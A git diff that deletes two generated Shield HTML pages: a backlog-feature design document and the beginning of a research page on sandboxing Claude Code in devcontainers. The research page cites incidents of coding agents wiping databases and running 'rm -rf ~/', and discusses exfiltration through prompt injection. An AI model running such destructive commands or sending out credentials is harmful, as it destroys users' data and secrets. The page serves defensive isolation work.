-the lazy safety net. Both call the one reconciliation engine and log every removal.</li>
-<li><strong>Manual remove.</strong> <code>/backlog remove &lt;id&gt;</code> plain-deletes an entry (confirm-before-delete);
-<code>git revert</code> recovers it only if it had reached a commit.</li>
-</ol>
-<pre class="mermaid">flowchart LR
-  add[&quot;/backlog add (user)&quot;] --&gt; store[&quot;backlog.json (atomic write)&quot;]
-  skill[&quot;capture() (agent)&quot;] --&gt; store
-  store --&gt; view[&quot;/backlog view\n(ordered + status badges)&quot;]
-  man[&quot;manifest.json&quot;] --&gt; view
-  view --&gt; promote[&quot;/backlog promote &lt;id&gt;\n(transient reference)&quot;]
-  promote --&gt; step[&quot;/research | /prd | /plan | /implement&quot;]
-  step --&gt; recon[&quot;reconciliation engine&quot;]
-  view -. lazy sweep .-&gt; recon
-  recon --&gt; store
-</pre>
-<h2 id="5-functional-requirements-functional-requirements">§5 Functional Requirements {#functional-requirements}</h2>
-<p><strong>Backend interpretation</strong> — each item is a verifiable behavior:</p>
-<ul>
-<li><strong>F1.</strong> <code>backlog.json</code> validates against <code>shield/schema/backlog.schema.json</code>; an entry
-with an unknown <code>kind</code> (∉ {epic, story, task}) or <code>source</code> (∉ {user, agent}) is rejected
-with a named error.</li>
-<li><strong>F2.</strong> Entry <code>id</code> is a <code>uuid4</code> string; the <strong>validator</strong> (<code>validate_backlog.py</code>) rejects an
-<code>entries[]</code> array containing duplicate <code>id</code> values with the named error <code>duplicate_entry_id</code>.
-(JSON Schema draft 2020-12 <code>uniqueItems</code> is whole-item equality and cannot express
-property-level uniqueness, so this check lives in the validator, not the schema.)</li>
-<li><strong>F3.</strong> <code>capture(text, *, kind=&quot;task&quot;, feature=None, epic=None, source) -&gt; str</code> appends one
-entry, assigns the next integer <code>order</code> and a fresh <code>uuid4</code> id, and returns that id. It is
-callable from <code>/backlog add</code> (source=user) and from any skill (source=agent).</li>
-<li><strong>F4.</strong> All writes are atomic: full document → <code>backlog.json.tmp</code> → <code>os.replace()</code>. A kill
-mid-write never leaves a corrupt <code>backlog.json</code> (at most a stray <code>.tmp</code>).</li>
-<li><strong>F5.</strong> Reads are validate-or-refuse: a malformed/partial <code>backlog.json</code> raises
-<code>BacklogInvalid</code> (named error), never a silent truncation or partial parse.</li>
-<li><strong>F6.</strong> Promotion forwards the entry id as a <strong>transient runtime reference only</strong>; neither
-<code>plan.json</code> nor any story record is mutated by promotion (the no-stamping trust boundary).</li>
-<li><strong>F7.</strong> Feature/epic suggestion uses <strong>exact normalized match</strong> (<code>casefold()</code> + collapsed
-whitespace) by <strong>name</strong>, for both existing and proposed-new epics. No fuzzy/token-overlap
-ranking. A tie (≥2 normalized matches) surfaces all tied candidates and auto-picks none;
-no match → the entry is captured proposed-new.</li>
-<li><strong>F8.</strong> The <strong>&quot;epic landed&quot; predicate</strong> (single source of truth, used by every removal path):
-an entry is removed iff an epic with the matching <strong>normalized-exact name</strong> is <strong>present in
-<code>plan.json.epics[]</code></strong>. The match is by <strong>name, not by the positional <code>EPIC-N</code> id</strong> — <code>EPIC-N</code>
-is a within-a-single-plan slot reassigned on every re-<code>/plan</code>, so it is not a stable cross-plan
-key (an epic reordered across a re-plan must still resolve by name). Story <code>status</code> is never
-consulted; a <code>prd</code>-only feature is never removed; ambiguity or no match → the entry stays.</li>
-<li><strong>F9.</strong> Eager prune (end of promoted <code>/plan</code>|<code>/implement</code>) and lazy sweep (<code>/backlog</code> view)
-are idempotent (remove-if-present) and call the same reconciliation engine. Every removal
-emits a structured log line: <code>{entry id, feature, epic, match-kind (id|name), triggering run, gating plan.json path}</code>.</li>
-<li><strong>F10.</strong> A <code>.shield.json</code> flag <code>backlog.auto_reconcile</code> (default <code>true</code>) disables both
-eager prune and lazy sweep when <code>false</code>, leaving manual remove functional.</li>
-</ul>
-<h2 id="6-non-functional-requirements-non-functional-requirements">§6 Non-Functional Requirements {#non-functional-requirements}</h2>
-<p><strong>Backend interpretation</strong> — measurable targets and guarantees:</p>
-<ul>
-<li><strong>N1 — Integrity under single-writer.</strong> Shield is single-actor (N5), so v1 assumes one
-writer: no lock. Correctness rests on full-doc → <code>.tmp</code> → <code>os.replace()</code> (atomic rename),
-validate-or-refuse reads, <strong>and a compare-before-replace check</strong>: <code>capture()</code>/<code>remove()</code>
-record the on-disk <code>schema_version</code>+entry-count (or mtime/hash) at read time and refuse the
-<code>os.replace()</code> (raising <code>BacklogInvalid</code>) if the file changed underneath. This converts a
-silent lost-update — the failure mode if N5 is violated — into a loud refusal <strong>without a
-lockfile</strong>. The concurrency eval (EPIC-4-S1) asserts the refusal fires and <strong>no entry is lost
-or corrupted</strong>. Multi-writer locking is deferred until Shield becomes multi-actor.</li>
-<li><strong>N2 — View latency.</strong> <code>/backlog</code> view + lazy sweep completes in <strong>≲ 1s</strong> for a backlog of
-≤ ~200 entries against a typical <code>manifest.json</code>. A debug-gated latency line reports actual
-view+sweep wall time so &quot;revisit if breached&quot; is falsifiable rather than impressionistic.</li>
-<li><strong>N3 — Drift tolerance / no-crash.</strong> An unrecognized <code>manifest.json</code> / <code>plan.json</code> shape is
-treated as <strong>doubt</strong> (entry stays) with a logged warning; reconciliation never raises on a
-shape it doesn't recognize.</li>
-<li><strong>N4 — Recoverability.</strong> <code>backlog.json</code> is git-tracked; a wrong removal that reached a commit
-is recoverable via <code>git revert</code>. For an <strong>end-of-run eager prune</strong> (which may fire before
-<code>backlog.json</code> is committed), the v1 recovery mechanism is the transient append-only
-<code>.shield/backlog-removed.log</code>: the pruned entry is appended <strong>before</strong> the destructive remove,
-and replaying the log restores it. Commit-before-prune was considered and rejected as a v1
-non-goal (it would force a possibly-dirty-tree commit on every prune and couple recovery to git
-state mid-<code>/implement</code>). A manual remove of an <em>uncommitted</em> entry is unrecoverable by design
-(documented).</li>
-<li><strong>N5 — Single-actor assumption.</strong> The whole concurrency posture (N1) and the no-lock design
-rest on Shield being driven by one actor at a time. This is stated as an assumption, not a
-guarantee; if violated, N1's mitigation must be revisited.</li>
-</ul>
-<h2 id="7-high-level-design-high-level-design">§7 High-Level Design {#high-level-design}</h2>
-<p><strong>Backend interpretation</strong> — components and the data they exchange. Three Python
-components plus the command/skill surface, all reading/writing the one store.</p>
-<pre><code>        ┌────────────────────────────────────────────────────────────┐
-        │  /backlog command  +  backlog SKILL.md  (add/view/remove/    │
-        │                       promote)                                │
-        └───────┬───────────────┬───────────────┬─────────────────────┘
-                │ capture()      │ view          │ promote(id)
-                ▼                ▼               ▼
-        ┌───────────────┐  ┌──────────────┐  (transient ref → /plan|/implement)
-        │ backlog-store │  │ epic-suggester│
-        │ (atomic R/W,  │  │ (manifest +   │
-        │  validate)    │  │  plan.json    │
-        │               │  │  exact-norm   │
-        │               │  │  match)       │
-        └──────┬────────┘  └──────┬────────┘
-               │ read/write       │ read
-               ▼                  ▼
-        ┌──────────────────────────────────────┐
-        │ docs/shield/backlog.json (ordered)    │
-        └──────────────────────────────────────┘
-               ▲                  ▲
-               │ remove-if-present│ read (epic-landed predicate, F8)
-        ┌──────┴────────┐         │
-        │  reconciler   │─────────┘  reads manifest.json (feature index)
-        │ (engine + eager│            + flagged plan.json (epics[])
-        │  prune + lazy  │
-        │  sweep + kill  │
-        │  switch + log) │
-        └────────────────┘
-</code></pre>
-<ul>
-<li><strong><code>backlog-store</code></strong> owns the store contract: schema, <code>capture()</code>, read (validate-or-refuse),
-remove, atomic write. It is the only writer of <code>backlog.json</code>.</li>
-<li><strong><code>epic-suggester</code></strong> is read-only: given capture text + a candidate feature, it scans
-<code>manifest.json</code> features and the feature's <code>plan.json</code> epics and returns exact-normalized
-candidates (F7). It never writes.</li>
-<li><strong><code>reconciler</code></strong> holds the engine (F8 predicate + never-remove-on-doubt + drift tolerance +
-removal logging) and the two triggers (eager prune, lazy sweep) gated by the kill switch (F10).
-It calls <code>backlog-store</code> to remove entries.</li>
-<li><strong><code>manifest.json</code></strong> is the <strong>feature index</strong> (does the feature exist? does it have a
-<code>plan.json</code>?). <strong><code>plan.json.epics[]</code></strong> is the <strong>removal gate</strong>. No ids are stamped into either.</li>
-</ul>
-<h2 id="8-alternatives-considered-alternatives-considered">§8 Alternatives Considered {#alternatives-considered}</h2>
-<ol>
-<li><strong>Stamp a backlog-entry id into <code>plan.json</code> / story records at promotion.</strong> Would make
-reconciliation a trivial id lookup. <strong>Rejected:</strong> it couples the pre-pipeline staging area
-into the committed plan format (a schema change to <code>plan.json</code>), pollutes the PM-sync surface,
-and breaks the &quot;no ids tracked&quot; PRD decision. Matching on feature (manifest) + epic name/id
-(plan) keeps the backlog a pure overlay (F6/F8).</li>
-<li><strong>Per-feature backlogs</strong> (a <code>backlog.json</code> per <code>docs/shield/&lt;feature&gt;/</code>). <strong>Rejected for v1:</strong>
-the dominant capture moment is &quot;future work with no feature yet,&quot; so a global store with a
-<em>proposed-new</em> feature association fits the actual flow; per-feature adds a global↔local
-promotion path with no v1 payoff.</li>
-<li><strong>A status/workflow state machine</strong> (<code>captured → triaged → promoted → done</code>). <strong>Rejected:</strong>
-the lifecycle is minimal — an entry exists until removed (promotion-prune, sweep, or manual).
-A state machine is unmeasurable scope creep against the §7 success metric.</li>
-<li><strong>A project-level epic index</strong> to avoid opening <code>plan.json</code> files during reconciliation.
-<strong>Rejected for v1</strong> (kept as PRD §9 open question): <code>manifest.json</code>-as-index + opening only
-<em>flagged</em> <code>plan.json</code> files is simpler and within the N2 budget; add the index only if N2 is
-breached (the debug latency line makes that decision data-driven).</li>
-<li><strong>A lockfile for concurrent writes.</strong> <strong>Rejected for v1:</strong> the single-actor assumption (N5)
-makes atomic-rename + validate-or-refuse sufficient (N1); a lock is dead weight until Shield
-is multi-actor.</li>
-</ol>
-<h2 id="9-cross-cutting-concerns-cross-cutting-concerns">§9 Cross-Cutting Concerns {#cross-cutting-concerns}</h2>
-<ul>
-<li><strong>Validation.</strong> One schema (<code>backlog.schema.json</code>) + one validator (<code>validate_backlog.py</code>)
-gate every read and the eval suite. Validate-or-refuse is the single integrity primitive.</li>
-<li><strong>Logging.</strong> Two logged surfaces: (a) every reconciliation <strong>removal</strong> with rationale
-(F9 structured line), and (b) every never-remove-on-doubt decision (N3 warning). Removals are
-never a silent <code>git diff</code>.</li>
-<li><strong>Configuration.</strong> <code>.shield.json</code> gains <code>backlog.auto_reconcile</code> (bool, default <code>true</code>) — the
-kill switch (F10). No secrets; the store is plaintext JSON, git-tracked.</li>
-<li><strong>Schema evolution.</strong> <code>schema_version</code> is set in v1 so future shape changes (priority buckets,
-audit trail) migrate read-old/write-new. v1 ships <strong>no live <code>migrate()</code> code</strong> — the policy is
-documented only (doc-only until <code>schema_version</code> 2), to avoid mistaking documentation for
-working code.</li>
-<li><strong>Recovery.</strong> N4 governs the destructive paths: commit-before-prune or
-<code>.shield/backlog-removed.log</code>; manual-remove-of-uncommitted is unrecoverable by design.</li>
-</ul>
-<h2 id="10-milestones-milestones">§10 Milestones {#milestones}</h2>
-<p>The ship plan below is <strong>rendered from <code>plan.json</code> <code>milestones[]</code></strong> — it is the structured
-source of truth. Do not hand-edit the region between the markers; edit <code>plan.json</code> and re-run
-<code>/plan</code> to refresh it. Exit criteria tie back to §5 (F1–F10) and §6 (N1–N5).</p>
-<!-- BEGIN rendered:milestones — do not edit, regenerated by /plan from plan.json -->
-<h3 id="m1--capture--store--view--no-deps">M1 — Capture + store + view  <em>(no deps)</em></h3>
-<p><strong>Outcome:</strong> A global docs/shield/backlog.json exists; entries can be added (user + agent) with order, kind, source, and a feature + epic association; /backlog renders the ordered list with per-entry pipeline status from manifest.json; an entry can be manually removed.</p>
-<p><strong>Exit criteria:</strong></p>
-<ul>
-<li>backlog.json has a documented JSON Schema with a top-level schema_version and per-entry {id, order, kind, source, feature, epic, text}; ids are unique across entries[]; shield/scripts/validate_backlog.py exits 0 on valid and non-zero with a named error on invalid.</li>
-<li>An entry can be captured both from the user (/backlog add) and from a Shield skill via the documented write helper; the write is atomic (temp-then-rename) and validate-or-refuse.</li>
-<li>/backlog renders entries in order with each entry's feature + epic and a research/prd/plan status read from manifest.json.</li>
-<li>/backlog can remove an entry by id (plain delete; no retained history).</li>
-</ul>
-<h3 id="m2--feature--epic-association--suggestion--deps-m1">M2 — Feature + epic association + suggestion  <em>(deps M1)</em></h3>
-<p><strong>Outcome:</strong> Every entry references a feature and an epic (existing or proposed-new); the agent suggests a matching feature/epic by scanning manifest.json features and plan.json epics, and the user can accept, pick another, or create-new.</p>
-<p><strong>Exit criteria:</strong></p>
-<ul>
-<li>Capture prompts for (or accepts) a feature + epic; both may be proposed-new.</li>
-<li>The agent proposes &gt;=1 candidate feature (from manifest.json) and &gt;=1 candidate epic (from the feature's plan.json) using exact-normalized match; the user can accept/replace/create-new.</li>
-<li>Suggestion never blocks capture — an entry can be captured with a proposed-new feature/epic when no match exists; a normalized-name tie surfaces all tied candidates and auto-picks none.</li>
-</ul>
-<h3 id="m3--promotion--reconciliation--deps-m2">M3 — Promotion + reconciliation  <em>(deps M2)</em></h3>
-<p><strong>Outcome:</strong> The user promotes an entry by starting /research, /prd, /plan, or /implement from it; the entry is removed when its work commits — eagerly at the end of the promoted /plan or /implement run, lazily on the /backlog sweep, or manually. Reconciliation matches by feature (manifest) + epic (plan.json) and never removes on doubt.</p>
-<p><strong>Exit criteria:</strong></p>
-<ul>
-<li>Promoting an entry passes it as a transient reference to /plan or /implement; on success that entry is pruned (eager).</li>
-<li>The /backlog sweep removes any entry whose epic's work now appears in the feature's plan.json (lazy safety net); a prd-only feature is NOT removed.</li>
-<li>Match key: both existing and proposed-new entries match by casefold+collapsed-whitespace exact epic NAME (never by positional epic id); on ambiguity or no match the entry stays.</li>
-<li>Eager prune and lazy sweep are idempotent (remove-if-present), share one reconciliation engine, log every removal with rationale, and treat an unrecognized manifest.json/plan.json shape as doubt (entry stays), never crashing.</li>
-<li>A .shield.json kill switch (backlog.auto_reconcile=false), made schema-valid by an additive 'backlog' object in shield.schema.json, disables eager prune and lazy sweep, leaving manual-remove only.</li>
-<li>An executable eval exercises capture (user + skill), view+status, manual remove, eager prune, lazy sweep, match-key, never-remove-on-doubt, concurrency (no lost entry), no-stamping (F6), and recovery-rehearsal with a RED-&gt;GREEN trail; the Shield plugin version is bumped per CLAUDE.md.</li>
-</ul>
-<!-- END rendered:milestones -->
-<h2 id="11-apis-involved-apis-involved">§11 APIs Involved {#apis-involved}</h2>
-<p><strong>Backend interpretation</strong> — the interface surface. Component-internal detail lives in the
-LLD drafts; this is the boundary contract.</p>
-<h3 id="backlogjson-document-shape"><code>backlog.json</code> document shape</h3>
-<pre><code class="language-jsonc">{
-  &quot;schema_version&quot;: 1,
-  &quot;entries&quot;: [
-    {
-      &quot;id&quot;: &quot;f47ac10b-58cc-4372-a567-0e02b2c3d479&quot;,  // uuid4 string, unique across entries[]
-      &quot;order&quot;: 10,                                     // integer; ascending = view order
-      &quot;kind&quot;: &quot;epic&quot;,                                  // enum: epic | story | task
-      &quot;source&quot;: &quot;agent&quot;,                               // enum: user | agent
-      &quot;feature&quot;: &quot;billing-retries&quot;,                    // feature folder slug (proposed-new allowed)
-      &quot;epic&quot;: &quot;EPIC-2&quot;,                                // epic id (existing) or name (proposed-new)
-      &quot;text&quot;: &quot;Add exponential backoff to webhook retries&quot;
-    }
-  ]
-}
-</code></pre>
-<h3 id="backlog_store-write-helper-locked--plan-review-2026-05-27"><code>backlog_store</code> write helper (LOCKED — plan-review 2026-05-27)</h3>
-<pre><code class="language-python">def capture(
-    text: str,
-    *,
-    kind: str = &quot;task&quot;,          # epic | story | task
-    feature: str | None = None,  # None ⇒ prompt / proposed-new at capture
-    epic: str | None = None,
-    source: str,                 # user | agent  (required, keyword-only)
-) -&gt; str:                        # returns the new entry's uuid4 id
-    &quot;&quot;&quot;Append one entry atomically. Raises BacklogInvalid on a malformed/partial store.&quot;&quot;&quot;
-</code></pre>
-<p>Every capturing skill builds against this signature. Companion store operations:
-<code>read() -&gt; dict</code> (validate-or-refuse, raises <code>BacklogInvalid</code>), <code>remove(entry_id) -&gt; bool</code>
-(remove-if-present, idempotent).</p>
-<h3 id="cli-surface-backlog">CLI surface (<code>/backlog</code>)</h3>
-<table>
-<thead>
-<tr>
-<th>Command</th>
-<th>Behavior</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><code>/backlog</code></td>
-<td>View ordered list + per-entry feature/epic/source + manifest status badges; runs lazy sweep (unless kill switch off).</td>
-</tr>
-<tr>
-<td><code>/backlog add &quot;&lt;text&gt;&quot;</code></td>
-<td><code>capture(..., source=&quot;user&quot;)</code>; prompts for feature+epic with agent suggestion.</td>
-</tr>
-<tr>
-<td><code>/backlog remove &lt;id&gt;</code></td>
-<td>Confirm-then-plain-delete (<code>remove(id)</code>).</td>
-</tr>
-<tr>
-<td><code>/backlog promote &lt;id&gt;</code></td>
-<td>Launch user-chosen step; forward <code>&lt;id&gt;</code> as transient reference (no stamping).</td>
-</tr>
-</tbody>
-</table>
-<h3 id="manifestjson-read-contract-consumed-not-owned"><code>manifest.json</code> read-contract (consumed, not owned)</h3>
-<p>The backlog reads — never writes — the existing <code>manifest.json</code>. Its real shape is pinned here
-so EPIC-2-S1 (status badges) and EPIC-3-S2 (reconciliation) build against ground truth rather
-than reverse-engineering the live file:</p>
-<pre><code class="language-jsonc">{
-  &quot;schema_version&quot;: 2,
-  &quot;features&quot;: [                       // a LIST keyed by name, not a feature-keyed map
-    {
-      &quot;name&quot;: &quot;billing-retries&quot;,      // == the docs/shield/&lt;feature&gt;/ folder slug (invariant)
-      &quot;artifacts&quot;: {                  // booleans, not paths
-        &quot;research&quot;: false,
-        &quot;prd&quot;: true,
-        &quot;plan_json&quot;: true,            // the flag the reconciler gates &quot;has a plan?&quot; on
-        &quot;plan_md&quot;: true,
-        &quot;plan_arch_md&quot;: false
-      },
-      &quot;reviews&quot;: { /* ... */ },
-      &quot;updated&quot;: &quot;2026-05-29T00:00:00+00:00&quot;
-    }
-  ]
-}
-</code></pre>
-<p>Key facts the components rely on: <code>features</code> is a <strong>list keyed by <code>name</code></strong>; <code>name</code> <strong>is</strong> the
-feature folder slug (the reconciliation key); <code>artifacts.plan_json</code> is a <strong>boolean</strong> flag, and
-the manifest does <strong>not</strong> store a plan path — the reconciler <strong>derives</strong> <code>docs/shield/&lt;name&gt;/plan.json</code>.</p>
-<h3 id="reconciler-engine-entry-point"><code>reconciler</code> engine entry point</h3>
-<p><code>reconcile(entry, *, manifest: dict, plans: dict[str, dict]) -&gt; RemovalDecision</code> — applies the
-F8 &quot;epic landed&quot; predicate. <code>manifest</code> is the parsed document above; <code>plans</code> is a
-<code>{feature-slug → parsed plan.json}</code> map the trigger populates by reading <code>docs/shield/&lt;slug&gt;/plan.json</code>
-for each feature whose <code>artifacts.plan_json == true</code>. Returns <code>REMOVE</code> / <code>STAY_AMBIGUOUS</code> /
-<code>STAY_NO_MATCH</code> / <code>STAY_DOUBT</code>, each carrying the rationale fields for the F9 log line
-(<code>{entry id, feature, epic, match-kind, triggering run, gating plan.json path}</code>). Pure function
-over already-read documents (testable without IO).</p>
-<h2 id="12-open-questions-open-questions">§12 Open Questions {#open-questions}</h2>
-<ol>
-<li><strong>Feature/epic discovery cost (PRD §9).</strong> Confirming a proposed-new epic means opening the
-<code>plan.json</code> the manifest flags as having one. <em>Lean:</em> manifest-as-index, open only flagged
-plans; add a project-level epic index only if N2 is breached. <strong>Resolve-by:</strong> after M1, from
-the N2 debug latency line.</li>
-<li><strong>Dropped/rejected terminal state (PRD §9).</strong> Is plain-delete enough, or do we need an explicit
-&quot;decided against&quot; state? <strong>Resolve-by:</strong> deferred to post-v1 (PRD §11 out-of-scope); revisit if
-the §7 metric shows entries being silently deleted rather than promoted.</li>
-<li><s>Capture-from-skill interface</s> — <strong>closed</strong> by F3 / EPIC-1-S2 (the <code>capture()</code> signature is
-locked).</li>
-</ol>
-<h2 id="13-references-references">§13 References {#references}</h2>
-<ul>
-<li>PRD: <a href="../prd.md"><code>./prd.md</code></a> (lean, reviewed Ready, composite 3.12)</li>
-<li>Execution plan: <a href="../plan.md"><code>./plan.md</code></a> · Sidecar: <a href="../plan.json"><code>./plan.json</code></a></li>
-<li>LLD drafts: <a href="../lld-backlog-store.md"><code>./lld-backlog-store.md</code></a>,
-<a href="../lld-epic-suggester.md"><code>./lld-epic-suggester.md</code></a>,
-<a href="../lld-reconciler.md"><code>./lld-reconciler.md</code></a></li>
-<li>Plan review: <a href="../reviews/plan/2026-05-27/summary.md"><code>./reviews/plan/2026-05-27/summary.md</code></a> (Ready, composite 3.14)</li>
-<li>PRD review: <a href="../reviews/prd/2026-05-27_2/summary.md"><code>./reviews/prd/2026-05-27_2/summary.md</code></a></li>
-<li>CLAUDE.md — mandatory eval-coverage policy; Shield versioning (<code>.claude-plugin/marketplace.json</code>).</li>
-<li>Existing Shield schemas read by reconciliation: <code>manifest.json</code> (feature index), <code>plan.json</code> (<code>epics[]</code> gate).</li>
-</ul>
-<h2 id="14-rollback-strategy-rollback-strategy">§14 Rollback Strategy {#rollback-strategy}</h2>
-<p><strong>Backend interpretation</strong> — the change is additive (new store, new command, new scripts) and
-ships behind observable triggers.</p>
-<p><strong>Steps to undo:</strong></p>
-<ol>
-<li><strong>Disable reconciliation without uninstalling:</strong> set <code>.shield.json</code>
-<code>backlog.auto_reconcile = false</code> (F10). Eager prune and lazy sweep stop; manual remove and
-capture/view still work. This is the first-line mitigation for a misbehaving reconciler.</li>
-<li><strong>Recover a wrongly-removed entry:</strong> replay it from <code>.shield/backlog-removed.log</code> (the v1
-recovery mechanism — appended before every destructive prune, N4), or <code>git revert</code> the commit
-that dropped it if the removal had already been committed.</li>
-<li><strong>Full feature back-out:</strong> revert the feature PR — removes <code>/backlog</code>, the scripts, and the
-schema. <code>backlog.json</code> itself is plain data; deleting it loses only captured entries (which are
-recoverable from git history while the file was tracked).</li>
-</ol>
-<p><strong>Triggers (observable):</strong></p>
-<ul>
-<li>Reconciliation removes an entry whose work is <em>not</em> in any <code>plan.json</code> (a confident-but-wrong
-removal) — surfaced by the F9 removal log → flip the kill switch, then <code>git revert</code>.</li>
-<li><code>/backlog</code> view+sweep exceeds the N2 ~1s budget (debug latency line) → flip the kill switch and
-evaluate the project-level epic index (§12 Q1).</li>
-<li>The eval suite (EPIC-4-S1) regresses on concurrency/no-lost-entry, no-stamping (F6), or
-never-remove-on-doubt → block release / revert the offending change.</li>
-</ul>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/devcontainer-implement-20260518/outputs/research.html b/docs/shield/devcontainer-implement-20260518/outputs/research.html
deleted file mode 100644
index 3a22c98b..00000000
--- a/docs/shield/devcontainer-implement-20260518/outputs/research.html
+++ /dev/null
@@ -1,324 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Research — devcontainer-implement-20260518</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#decision">Decision</a>
-</li>
-<li><a href="#why-not-the-alternatives">Why not the alternatives?</a>
-</li>
-<li><a href="#what-the-industry-recommends">What the industry recommends</a>
-<ul>
-<li><a href="#anthropic-engineering-canonical-source">Anthropic Engineering (canonical source)</a></li>
-<li><a href="#simon-willison-originator-of-lethal-trifecta--prompt-injection-terminology">Simon Willison (originator of &quot;lethal trifecta&quot; / prompt injection terminology)</a></li>
-<li><a href="#solomon-hykes-docker--dagger-founder">Solomon Hykes (Docker / Dagger founder)</a></li>
-<li><a href="#cursor-engineering">Cursor engineering</a></li>
-<li><a href="#github-copilot-coding-agent-most-candid-about-firewall-limits">GitHub Copilot Coding Agent (most candid about firewall limits)</a></li>
-<li><a href="#hacker-news-consensus-community">Hacker News consensus (community)</a></li>
-<li><a href="#jökull-sólberg-widely-cited-devcontainer-write-up">Jökull Sólberg (widely-cited devcontainer write-up)</a></li>
-<li><a href="#jessie-frazelle-containers-as-security-boundary--the-long-view-disagreement">Jessie Frazelle (containers as security boundary — the long-view disagreement)</a></li>
-</ul>
-</li>
-<li><a href="#lessons-from-documented-incidents">Lessons from documented incidents</a>
-<ul>
-<li><a href="#replit-production-db-wipe-july-2025">Replit production DB wipe, July 2025</a></li>
-<li><a href="#pocketos--cursor-opus-april-2026">PocketOS / Cursor-Opus, April 2026</a></li>
-<li><a href="#rm--rf--on-bare-metal-claude-code-late-2025">rm -rf ~/ on bare-metal Claude Code, late 2025</a></li>
-<li><a href="#prisma---accept-data-loss-claude-code14411">Prisma --accept-data-loss, claude-code#14411</a></li>
-</ul>
-</li>
-<li><a href="#footguns-in-the-reference-pattern">Footguns in the reference pattern</a>
-</li>
-<li><a href="#consensus-vs-disagreement">Consensus vs disagreement</a>
-</li>
-<li><a href="#how-this-works-in-practice-for-shield">How this works in practice (for Shield)</a>
-</li>
-<li><a href="#migration-path--reversibility">Migration path / reversibility</a>
-</li>
-<li><a href="#summary">Summary</a>
-</li>
-<li><a href="#references">References</a>
-</li>
-<li><a href="#further-exploration">Further Exploration</a>
-<ul>
-<li><a href="#long-form-blogs--articles">Long-form blogs / articles</a></li>
-<li><a href="#reference-implementations">Reference implementations</a></li>
-<li><a href="#podcasts">Podcasts</a></li>
-<li><a href="#specs--standards">Specs / standards</a></li>
-</ul>
-</li>
-</ul>
-</nav>
-<h1 id="isolating-claude-code-for-implement-style-autonomous-work">Isolating Claude Code for <code>/implement</code>-style autonomous work</h1>
-<p><strong>Status:</strong> Proposed
-<strong>Date:</strong> 2026-05-18
-<strong>Context:</strong> Shield's <code>/implement</code> runs TDD-style feature implementation — writes tests, runs builds and package installs, executes test suites, and commits. We need a recommended isolation pattern that protects the host machine and the developer's Claude credentials without making the developer experience painful. Local-only scope (no cloud/CI for this iteration).</p>
-<h2 id="decision">Decision</h2>
-<p>Adopt the <strong>two-boundary devcontainer pattern</strong> that Anthropic, Cursor, OpenAI Codex, Gemini CLI, and GitHub Copilot Coding Agent have all converged on:</p>
-<ol>
-<li><strong>Filesystem isolation</strong> — bind-mount only the workspace (read-write) and nothing else from the host. No <code>~/.ssh</code>, no <code>~/.aws</code>, no <code>~/.claude</code> bind-mount. Run as a non-root user inside the container.</li>
-<li><strong>Network egress isolation</strong> — default-deny outbound, allowlist only the endpoints <code>/implement</code> actually needs (Anthropic API, GitHub, npm/pypi/etc. registries the project uses). Implement via <code>iptables</code>+<code>ipset</code> inside the container, run on <code>postStartCommand</code> with <code>cap_add: [NET_ADMIN, NET_RAW]</code>.</li>
-<li><strong>Credentials live in a named Docker volume keyed by <code>${devcontainerId}</code></strong>, not bind-mounted from host. The user logs into Claude (<code>claude /login</code>) the first time the devcontainer is opened; credentials persist across container rebuilds but never appear in any host-side file the agent can read.</li>
-</ol>
-<p>This is the same pattern Anthropic ships in <code>anthropics/claude-code/.devcontainer/</code>. Shield's contribution is a scaffolder that generates this pattern per-repo, with a Shield-owned firewall script (named to avoid the upstream Feature naming collision documented in claude-code issue #32113).</p>
-<h2 id="why-not-the-alternatives">Why not the alternatives?</h2>
-<table>
-<thead>
-<tr>
-<th>Alternative</th>
-<th>Why not</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><strong>Bind-mount host <code>~/.claude/.credentials.json</code> read-only</strong> (what the brainstorm was trending toward)</td>
-<td>Industry consensus is the opposite. Anthropic's reference, Solberg's widely-cited write-up, and <code>streamingfast/sbox</code> all keep host creds off the mount path. The cost (one extra <code>claude /login</code> per project) is one-time and worth it.</td>
-</tr>
-<tr>
-<td><strong>No network firewall, &quot;we'll do it later&quot;</strong></td>
-<td>Egress is the single highest-leverage control. Willison: <em>&quot;Controlling network access cuts off the data exfiltration leg of the lethal trifecta.&quot;</em> Anthropic Engineering: <em>&quot;Without network isolation, a compromised agent could exfiltrate sensitive files.&quot;</em> Shipping without it leaves the most-cited attack vector wide open.</td>
-</tr>
-<tr>
-<td><strong>Run on host, gated by <code>--dangerously-skip-permissions</code> + hooks</strong></td>
-<td>Steve Yegge tried this and lost two days to an agent that erased passwords. Multiple <code>rm -rf ~/</code> incidents on bare-metal Claude Code in late 2025. Anthropic itself annotates its YOLO-mode loop snippet with <em>&quot;(Run this in a container, not your actual machine.)&quot;</em></td>
-</tr>
-<tr>
-<td><strong>microVM (Firecracker / gVisor / Edera) from day one</strong></td>
-<td>Overkill for local single-developer scope. Gemini CLI documents gVisor as its strongest tier; we can call this out as a future upgrade path for adversarial threat models (running untrusted PR diffs). For now, container + egress firewall is the industry-standard pragmatic point.</td>
-</tr>
-<tr>
-<td><strong>Container plus host bind-mount of secrets</strong></td>
